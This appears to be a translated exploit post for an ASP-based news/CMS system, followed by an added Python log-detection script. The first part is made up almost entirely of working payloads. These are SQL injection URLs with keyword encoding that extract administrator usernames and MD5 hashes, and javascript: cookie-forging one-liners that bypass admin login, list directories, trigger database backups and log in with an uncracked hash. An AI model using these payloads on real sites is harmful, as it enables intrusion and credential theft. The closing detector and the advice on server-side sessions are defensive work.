1. Injection
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2. Step one: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step two: request: admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.

2. Cookie spoofing

1. Entering the backend directly; applies to older versions. Generally, versions in which login.asp and admin_index.asp sit in the same directory have this vulnerability.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"

2. Directory listing.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."

3. Database backup (applicability seems rather low.)
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"

4. Method for entering the backend when the obtained MD5 password cannot be cracked
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
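Added example (not part of the original post): a small Python detector, run over constructed IIS-style log records, that undoes the percent-encoded keyword trick (%41nd, %53elect, %46rom) before matching and flags the forged-cookie patterns described above; the log layout, field names and rule names are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style records in the form "cs-uri-stem cs-uri-query cs(Cookie)"
# ("-" marks an empty field). These are made-up sample lines, not real traffic.
SAMPLE_LOG = [
    "news_more.asp lm=2 -",
    "news_more.asp lm=2+%41nd+1=2+union+%53elect+1,2,3,0x3b%26user,0x3b%26pass,6,7,8+%46rom+%41dmin -",
    "admin_index.asp - adminuser=%27or%27%3D%27or%27;+adminpass=%27or%27%3D%27or%27;+admindj=1",
    "edit/admin_uploadfile.asp dir=.. admindj=1",
    "admin_index.asp - adminuser=alice;+adminpass=5f4dcc3b5aa765d61d8327deb882cf99;+admindj=1",
]


def normalise(text):
    """Percent-decode until stable (the payloads encode keyword letters, e.g. %53elect,
    and could double-encode), then lowercase and collapse '+'/whitespace so that
    keyword matching is not evaded by the encoding alone."""
    prev = None
    while prev != text:
        prev, text = text, unquote(text)
    return re.sub(r"\s+", " ", text.replace("+", " ").lower())


SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b|\band\s+1\s*=\s*2\b")
TAUTOLOGY_RE = re.compile(r"'\s*or\s*'")      # the 'or'='or' value used in forged cookies
TRAVERSAL_RE = re.compile(r"\bdir=[^&]*\.\.")  # dir=.. against the upload/listing page


def analyse(record):
    """Return the list of rule names triggered by one record ([] when nothing matched)."""
    stem, query, cookie = record.split(" ", 2)
    query, cookie = normalise(query), normalise(cookie)
    findings = []
    if SQLI_RE.search(query):
        findings.append("sqli")
    if TRAVERSAL_RE.search(query):
        findings.append("traversal")
    if TAUTOLOGY_RE.search(cookie):
        findings.append("cookie_tautology")
    # Items 2 and 3 above set only admindj=1: the admin flag without any user cookie.
    if "admindj=1" in cookie and "adminuser=" not in cookie:
        findings.append("admindj_without_user")
    return findings


def scan(records):
    """Map record index -> findings for every record that triggered at least one rule."""
    return {i: f for i, r in enumerate(records) if (f := analyse(r))}


if __name__ == "__main__":
    for i, f in scan(SAMPLE_LOG).items():
        print(i, SAMPLE_LOG[i].split(" ", 1)[0], f)
```

The last sample record, a forged cookie carrying a valid username and hash as in item 4, matches nothing, because it is indistinguishable from a real login at the request level; that is why the lasting fix is server-side session state rather than trusting adminuser, adminpass or admindj cookies, with log matching only as a detective control.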